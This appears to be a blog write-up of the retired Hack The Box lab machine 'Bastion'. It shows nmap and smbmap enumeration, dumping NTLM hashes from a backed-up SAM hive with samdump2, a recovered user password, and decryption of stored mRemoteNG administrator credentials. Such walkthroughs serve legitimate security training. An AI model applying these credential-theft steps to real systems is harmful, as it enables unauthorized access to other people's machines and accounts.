Skip to main content

Bastion Writeup - Hack The Box (Retired)

Summary:

Bastion was one of the first few easy boxes that initially introduced me to HackTheBox. Created by L4mpje, a security enthusiast and hobbyist hacker, this box covers realistic Windows environment misconfigurations like unauthenticated file-shares and vulnerable apps with insecure password storage.


Finding a Foothold


Initial Enumeration:

root@kali:~/htb/# nmap -sV -sC -oA nmap/Bastion 10.10.10.134

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 13:31 AKDT
Nmap scan report for 10.10.10.134
Host is up (0.50s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h48m16s, deviation: 1h09m14s, median: 2h28m14s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-09-06T02:00:32+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-09-06T00:00:31
|_  start_date: 2019-09-05T22:49:39

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.07 seconds

Nmap indicates that Windows Service Message Block (smb) is an open port and guest authentication is supported. We can scan the host as anonymous for open smb shares using SMBMap.

root@kali:~/htb/Bastion# smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134                                      
 Disk                                               Permissions
 ----                                               -----------
 ADMIN$                                             NO ACCESS
 Backups                                            READ, WRITE
 C$                                                 NO ACCESS
 IPC$                                               READ ONLY

From the scan, Backups is the only accessible network share on the Windows Server. We can enumerate the contents of the share like so:

root@kali:~/htb/Bastion# smbmap -u anonymous -H 10.10.10.134 -R Backups
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134                                      
 Disk                                                   Permissions
 ----                                                   -----------
 Backups                                            READ, WRITE
 [!] Unable to remove test directory at \\10.10.10.134\Backups\huxZgSFPbY, plreae remove manually
 .\
 dr--r--r--                0 Thu Sep  5 16:28:09 2019 .
 dr--r--r--                0 Thu Sep  5 16:28:09 2019 ..
 -w--w--w--              116 Tue Apr 16 03:43:19 2019 note.txt
...
 .\\WindowsImageBackup\
 dr--r--r--                0 Fri Feb 22 03:44:02 2019 .
 dr--r--r--                0 Fri Feb 22 03:44:02 2019 ..
 dr--r--r--                0 Fri Feb 22 03:45:32 2019 L4mpje-PC
 .\\WindowsImageBackup\L4mpje-PC\
 dr--r--r--                0 Fri Feb 22 03:45:32 2019 .
 dr--r--r--                0 Fri Feb 22 03:45:32 2019 ..
 dr--r--r--                0 Fri Feb 22 03:45:32 2019 Backup 2019-02-22 124351
...

There are backups on the drive as well as a .txt file called note.txt. We can download the file and read it like so:

smbmap -u anonymous -H 10.10.10.134 -R Backups -A note.txt
root@kali:~/htb/Bastion# ls
10.10.10.134-Backups_note.txt
root@kali:~/htb/Bastion# cat 10.10.10.134-Backups_note.txt 

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Sensitive Information Gathering:

The note left for the systems administrators indicates that the backups are rather large and shouldn't be transferred under normal means. We can mount the share and explore its contents like so:

Exploring the share, we find two virtual hard disks:

To avoid downloading these VHD's, we could try mounting the disk with guestmount in a linux environment, but because Virtual Hard Disks are specifically Microsoft Disk Images, it's easier to explore the disks when connected to the share in a Windows environment:

Because this is an unencrypted virtual hard disk, we can explore the contents of the disk with ease using 7zip, including sensitive directories like Windows\System32\config\, which has the system's SAM and SYSTEM keys.

After extracting both keys to our host, we can recover all active user NTLM hashes using samdump2 (Note: This technique only works if the anniversary update was not installed prior to making the backup):

root@kali:~/htb/Bastion# samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

We can either crack the last user's password hash with hashcat or reverse-lookup the NTLM hash in an online hash lookup repository (assuming this password in rockyou).

Username: L4mpje
NTLM Hash: 26112010952d963c8dc4217daec986d9
Password: bureaulampje

Acquiring user.txt


Getting Shell Access:

We can verify that our credentials are valid using smbmap as L4mpje; however, we notice that we cannot acquire a shell using PsExec because we still do not have read/write access to the ADMIN$ share:

root@kali:~/htb/Bastion# smbmap -u L4mpje -p bureaulampje -H 10.10.10.134
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134                                      
 Disk                                               Permissions
 ----                                               -----------
 ADMIN$                                             NO ACCESS
 Backups                                            READ, WRITE
 C$                                                 NO ACCESS
 IPC$                                               READ ONLY

We can, however, connect over ssh as indicated by our nmap scan earlier:

root@kali:~/htb/Bastion# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>hostname                                                                                         
Bastion                                                                                                                         

l4mpje@BASTION C:\Users\L4mpje>whoami                                                                                           
bastion\l4mpje                                                                                                                  

l4mpje@BASTION C:\Users\L4mpje>whoami /priv                                                                                     

PRIVILEGES INFORMATION                                                                                                          
----------------------                                                                                                          

Privilege Name                Description                    State                                                              
============================= ============================== =======                                                            
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                            
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled                                                            

l4mpje@BASTION C:\Users\L4mpje>type .\Desktop\user.txt                                                                          
9bf***************************cd

Acquiring Administrator Credentials and root.txt


Poorly Encrypted Passwords:

Enumerating some of installed applications, we find one program that particularly stands out:

PS C:\Program Files (x86)> ls                                                                                                   


    Directory: C:\Program Files (x86)                                                                                           


Mode                LastWriteTime         Length Name                                                                           
----                -------------         ------ ----                                                                           
d-----        16-7-2016     15:23                Common Files                                                                   
d-----        23-2-2019     09:38                Internet Explorer                                                              
d-----        16-7-2016     15:23                Microsoft.NET                                                                  
da----        22-2-2019     14:01                mRemoteNG                                                                      
d-----        23-2-2019     10:22                Windows Defender                                                               
d-----        23-2-2019     09:38                Windows Mail                                                                   
d-----        23-2-2019     10:22                Windows Media Player                                                           
d-----        16-7-2016     15:23                Windows Multimedia Platform                                                    
d-----        16-7-2016     15:23                Windows NT                                                                     
d-----        23-2-2019     10:22                Windows Photo Viewer                                                           
d-----        16-7-2016     15:23                Windows Portable Devices                                                       
d-----        16-7-2016     15:23                WindowsPowerShell                                                              

Researching this application yields an insecure password storage vulnerability in older versions of the application. Using mremoteng-decrypt, we can decrypt the credentials of the administrator user:

We can then ssh into the server as the administrator user and recover root.txt:

root@kali:~/htb/Bastion# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

administrator@BASTION C:\Users\Administrator>hostname                                       
Bastion                                                                                     

administrator@BASTION C:\Users\Administrator>whoami                                         
bastion\administrator                                                                       

administrator@BASTION C:\Users\Administrator>type .\Desktop\root.txt                        
958***************************c8                                                                                  

We pwned the built-in Administrator user!
Although the journey to the administrator user wasn't too difficult, what ultimately makes this box a genuinely good box is that it shares many of the qualities (and vulnerabilities/over-zealous permissions) that real-world environments have.

Rayce Toms
Student Researcher

Comments

Popular posts from this blog

Helpline Writeup - Hack The Box (Retired)

Summary: Helpline is one of the more advanced and difficult machines on Hack The Box . There is more than one solution to many of the parts of this machine; however, it ultimately leads to some necessary cryptography at the end. What's more interesting is that this box highlights the limitations of the NT AUTHORITY\SYSTEM user. The box was created by egre55 , a security researcher, sysadmin, and penetration tester. Initial Foothold Scanning the host: nmap -sV -sC -oA nmap/Helpline 10.10.10.132 Results: PORT   STATE   SERVICE         VERSION 135/tcp   open  msrpc         Microsoft Windows RPC 445/tcp   open  microsoft-ds? 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 8080/tcp  open  http-proxy    - ... |     HTTP/1.1 200 OK ... |_http-title: ManageEngine ServiceDesk Plus 49667/tcp open  msrpc         Microsoft Windows RPC Visiting the http server on port 8080, w

Luke Writeup - Hack The Box (Retired)

Summary: Luke , a FreeBSD box created by HackTheBox user H4d3s , was an overall simple medium-difficulty box. Rooting this host is mostly a matter of taking advantage of its sensitive information disclosure, its password reuse, and its over-zealous privileges that are available from the web host. This was the first box where I had rooted the box before getting user. Finding a Foothold Initial Enumeration: root@kali : ~/htb/ # nmap -sV -sC -oA nmap/Luke 10.10.10.137 Starting Nmap 7.80 ( https://nmap.org ) at 2019-07-15 18:35 AKDT Nmap scan report for 10.10.10.137 Host is up (0.12s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3+ (ext.1) | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.39 | Logged in as ftp | TYPE: ASCII | No session upload bandwidth limit |